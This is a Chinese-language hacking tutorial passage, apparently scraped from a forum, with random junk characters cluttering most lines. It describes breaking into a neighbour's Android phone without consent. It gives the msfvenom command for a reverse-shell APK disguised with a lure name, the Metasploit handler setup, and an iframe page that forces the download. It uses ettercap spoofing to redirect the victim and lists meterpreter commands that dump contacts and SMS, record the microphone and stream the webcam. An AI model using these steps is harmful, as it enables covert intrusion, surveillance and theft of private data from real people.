) I/ H" j8 y1 v# b
五、msf+ettercap入侵邻居安卓手机
0 m" W; y/ n, t . ~3 \2 [$ M4 u; n$ C& C7 n
! W6 r' Q' z2 g$ d4 ]! c, X9 o 首先启动msf * y8 B# B1 V4 [
" q' F( Z* q4 P
& I% [( o3 U/ Y& Z
先用kali生成一个安卓木马,如下命令: 8 y: M- s. M+ o: V. r
+ q7 r6 r1 g7 K9 Y7 K
% C1 N, [1 a- q0 E& C W Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk ) P% y, G# y' H
/ w, O5 G2 p0 _' ?7 o! ^3 K; d& I/ I I$ G. v6 U/ n1 `& ~
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
4 H1 E' B1 U* d. H/ e7 k4 B1 V 5 l5 x( a; Q" L% s
* Z5 @4 O* y+ U4 N- J4 i1 [% u4 q 然后进入msf
) B% z( |. I/ r; `# c
1 D5 K1 v/ N# F% s T; j. n4 u6 s% G
$ Y0 N' d6 X& p# Z, W. i3 A use exploit/multi/handler
% O( c( H x3 C! h1 x( x
# V9 z( ^9 \& L+ R0 g
4 Q- @2 L8 u- _* u- W7 Q, u& I set payload android/meterpreter/reverse_tcp & G6 [* T! W& V4 ], x a
9 a# s8 M- M% P% X* J7 M) G. c- T+ i& E+ P8 [% X
set LHOST 192.168.0.109 //ip为kaili的ip
5 E% `* _: ^1 S% S ' M4 Y( _: @4 K I1 W( C
; I, \/ l0 c3 ?2 } set LPORT 44444 //端口一定要与前面生成的木马的端口一致
% d5 V$ m% M) X' }, n) Q 1 l/ {3 \, i; }8 n3 t& ]8 `% \$ k
2 O, S9 R# K' {( K: h Exploit
; F* Q! I2 W. Z0 d9 { + L* A, R3 q2 P# n- Y
4 |( m/ l" i7 X; ]4 Y3 ? 8 j7 ?) T# l& u
c! a- Y0 U( X o; ^3 k) y1 w
下面我们开启ettercap -G
6 A9 `0 Z3 Q1 n 7 q! E9 ]- K9 U3 A$ @
# k9 Z: j4 K1 R2 m) H 我物理IP为
5 q" o& m; k3 h' m 0 [" z9 l0 F, G$ o. L) E& k1 p
) {" {' A5 {$ F5 o% e3 X" z$ e/ L' Q 3 u- B* @2 Y1 t9 Q0 x) B+ M3 l9 A
- ~# x. V4 t! ?$ ^; N t
! t# z0 E8 L3 N
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, B7 \: P) T, I
1 Y. t0 t1 [4 z* v- ?' S0 F2 H6 |! D* O
下面我们来设置一下 # x. S; E2 Q9 E# ]# D; ~
/ O! x/ e9 y) X1 j. x+ [9 Q, O5 v+ h
# u+ P/ ?1 }) N8 b 2 @% J& Z* y7 l# Y4 c
# L% i2 `, w( p# Y& Y& ~8 p, ^
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
- q( m3 g1 d( m+ f3 }6 I) y ( T" M0 Y% f5 \. \0 N8 y- d
4 b' [5 c7 h# H d 3 y9 F) V( y& E2 _0 [
1 |3 x- t9 ?7 C7 J
* M% |! r+ A- @2 p
% E7 \3 M$ o& H( W
l. _* v$ `5 d0 a% G/ f8 V" J: s! h0 ]
) z2 r6 S' A8 m 1 `* a9 r0 x5 \, m" Q6 [4 {
8 _* T4 P H. g- _/ q+ b& T , a% B+ Q/ n& \5 [, u3 X) _
% |- [4 z$ v5 Y0 y3 ^+ u! Q" H% f8 G4 ?. D
3 p1 Q/ T" {6 s. `4 r7 F/ q, d0 j
! C- F. o. W/ W" e: O* l& g) Y5 ]3 ? j3 e8 b
3 m* ]: O& Y% O0 T
9 Z9 j1 i7 ~/ }
( z, e2 Z2 g# u/ a4 r$ b
( @+ E. P* Z) o% I Y / ]3 w( m+ Q( z) s( }
! J$ F1 o W! ~6 Y 4 e) q: [' A# B$ t: V: l. E
: R0 x0 y* ?' J) h% K; v3 V; S A* w8 j0 n/ s6 G8 P3 {
, \" o }/ t9 M; d5 `1 B! ?! N4 r
/ R5 ]" D! A% E7 C; R
6 |* r5 B& U( [' C4 b $ {2 ~7 [) o( F
- B. h" o: t* r: v, }2 k
7 Z: a; T- B' ~* V" p J
/ D6 i- L: D' P" R ! M2 v( R2 A. D
) z: M! o: G& H( C$ F
# u" R) A" t# [9 g2 b
) d8 t9 g' ]* |% _1 y' G
( k7 ~2 u3 Y% p
6 M& ^- N4 @" u/ C6 @ 9 \4 Y; |' M) f
% C/ y' f9 x7 ]5 q. Q/ O, F6 z
下面我们开始攻击 1 Z* y# B8 d! O; b$ I- R3 B
0 F# j$ N8 I8 g. X7 R
; q, ^; |$ i2 B J5 w4 k# K
$ S/ w" Z/ t6 L1 l
! t& z# ^9 y! c0 j Z9 `
- T$ b+ \( A* S8 |7 a# q9 x $ \! q# X) K. j7 Q' J f
# H& Z! _* v# ` B7 d: J3 p
, O6 \/ b+ _0 E, i' w/ f& j 6 v4 _4 d/ @3 Q2 Y% R5 h6 L! h
4 P$ N: @: K- ^2 n2 d% r& f5 ]5 ]0 ~, U3 W
, S" @# \5 P- i) q, m
3 Z# [* `1 \3 P* [( r! p+ a# }# ?( x
: i+ u+ S& O; o
! I# {. e5 c9 p U9 b9 K
2 y/ z' U& a! q1 {
* x4 E" F# e# c x
大概过了5分钟多,发现反弹成功了 ! c% y! s; b7 z; `1 M
" D; H* F% V, u/ W Y; [, Z; ~0 T
4 `/ i0 w* G/ E. i ! L) p+ B/ F/ D2 I% S/ K
: U' q& s2 w+ J- c/ H- A8 Q( y( p3 G9 \ [1 Z
) q- U7 g+ b ?& a# W- {
. w$ Y6 J) x" ~. H8 g( ]
% \$ D2 M: B9 ?- t : Q' W4 S9 Z$ C# }
( }+ Q' q. H1 D2 O- c, {/ L' n5 ^% o7 P4 ]0 f2 _$ a
* y) g8 z4 j' \% w4 d9 J% U( n
! D1 n" f. P% J, Y. W9 Q) |0 {' o8 }9 i
! e* U, ]5 }. b2 @( W. }* t
! L, V' ?9 X i% T z5 D0 N% i) y O% q
4 `- [% T9 z# g* `; D " W2 L& b( d- b2 S7 V9 T& Q, Y7 l
+ L& {4 _7 {* X! B: l4 _2 Y# }: T; t* Q3 B* ]1 K; d# p
$ Z: v, [2 q: X( `
3 g! H/ U8 @ r3 U2 E' s
/ h( r' }) Z% W 执行命令 8 O% A" ~. h3 K; h6 w* l
9 [ ~+ V* h, r: Z
5 B: f5 A! F; u ' I+ S# S' C( z0 i( U9 n
6 e4 o8 F" p) S3 X ]
9 w0 N0 m4 c6 F$ `; Z dump_contacts --》这个是导出电话
. e! S$ _& m4 R) x
0 {- a; P2 e8 c) W: C! M- R: v4 A4 F9 i( J' H
dump_sms --》这个是导出信息
3 j5 }! c9 R Y# K& U$ [3 _
( |1 f |. J: `; F! K; A. _5 v4 g% q8 N0 m' H
record_mic Record audio from the default microphone for X seconds $ J, ?8 c1 o8 h( U3 k3 r5 B" l# V
$ n, f8 B+ D" V0 Y" A, {& ?. |, s3 T" ^4 u* z
webcam_chat Start a video chat
8 {4 M6 l5 R: z& C ?5 Y# m3 S5 Q- f$ e6 {( ^
% |) G) \/ y: [/ ^8 o1 {$ r7 K
webcam_list List webcams
: X0 `. x' N/ R+ T l0 G7 N0 ^- J % E2 H9 ? L. g4 ^# \5 Z
; b# a9 h1 x. ^6 y3 x! ]( q" G" H webcam_snap Take a snapshot from the specified webcam ) @1 A2 M6 B9 D& j% y
. f9 k( G: T7 b* v, K! s7 f0 O
+ [- s# s6 I. z6 m- K5 r+ g, t
webcam_stream   lay a video stream from the specified webcam # q. y$ q5 b: g5 [5 r' i3 H9 y H/ r
0 b- c/ x) z+ K
& J8 x k, z1 t/ B {) \
7 E1 k @) A d# P3 p 6 G. @/ R% l6 W9 t, G6 `& t) Y2 ~2 o
: Z% d1 s8 o4 A& `! j4 g1 B; J
5 m# m7 x3 J C) k0 T& z& d
: w8 _6 P8 H9 t& Q3 E/ ^
J9 v7 h( E# _- W 我们打开看一下电话薄,
3 U$ E& b- F7 e' B
$ ^8 Z3 v9 P7 C
4 @, q; T3 ~5 Y* j" K% T; h
! |. i/ q! I, z. y# c
" F5 |% F3 O/ E: a4 p: M: c' E' V
, Q0 x! z( ?! a+ _+ q8 o , p6 U# T; e N. M7 K8 x
1 i, B2 r% N* s. ]) D {9 l8 w t5 `
7 P0 w, P, a. n9 M; Q
; V6 J0 R: h! @7 P6 `; s0 ^$ \
( m% o$ R% C5 t; M
' L4 @; h* K( }& N5 M5 L* m
( i+ Y7 L% ]4 I* k
) ?: A) z! |! |( V3 |2 }+ ]& G. U& n
1 h2 r; p# ], C1 }* V6 B
2 h$ L. g) S0 @ y3 Z) l3 X/ w9 N. ^9 T4 K( |% _
( H0 d6 n, Z ^; M3 `* N, U* `8 ]
4 C8 Z- a0 E4 o1 L* h7 b8 m# p b2 Z* F
我们同时欺骗成DroidJack木马,使用方法如图:
, F, G. @7 Q4 z' |. q* k$ D
5 @2 M$ y% x5 y1 a+ u7 {2 w6 C& o0 R. } [6 p5 j& ~; W1 {
( w P- J' m2 G+ E7 n, q% C! ~
2 n$ Z: ]' u! W1 v8 ^6 ~
& a, p% c2 o9 M. r; R+ N/ s' C* ` # n/ Y8 l" ]4 i) s
; R$ `% w! M% D$ ^7 w1 T5 l& x/ y9 Q6 _7 U! \1 y E
" y+ B9 e z4 v3 H ' k/ N6 v( V% B% @
7 D+ {) r+ O# h( u( i1 c' i
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 0 u# C: a W7 K3 {1 d3 r
$ B0 j% }$ v% G( M3 }) U
$ P4 p5 J0 B$ P/ k5 v/ M; @
1 n% J$ H7 B, V5 T
# l& I+ M! o2 u B; k5 |* L& ~9 E" |& F$ M: H6 i
! B a* }5 J2 Z' v6 P+ e5 }/ Y 9 G& Z: E: D, f6 y I7 f
0 E! r- Z+ [1 I2 [
8 `- S8 _$ k% q) a8 Z; Q1 c/ u. k9 ^ 9 I) k9 ~1 P, A- M- L
. {& m5 E7 c- Y; H% h# R ![](https://www.2k8.org/content/uploadfile/201809/22/29b505b3f21449b185bc7b76d957e81b.jpg) ) x% K+ h1 z2 Q% c& B1 P6 V
- h$ y/ ]) m: }5 [% w0 k! Z
2 k6 p) x, [* K7 b2 w" _$ m 1 ~7 M1 _1 I/ u/ @, N) t- ~! \
|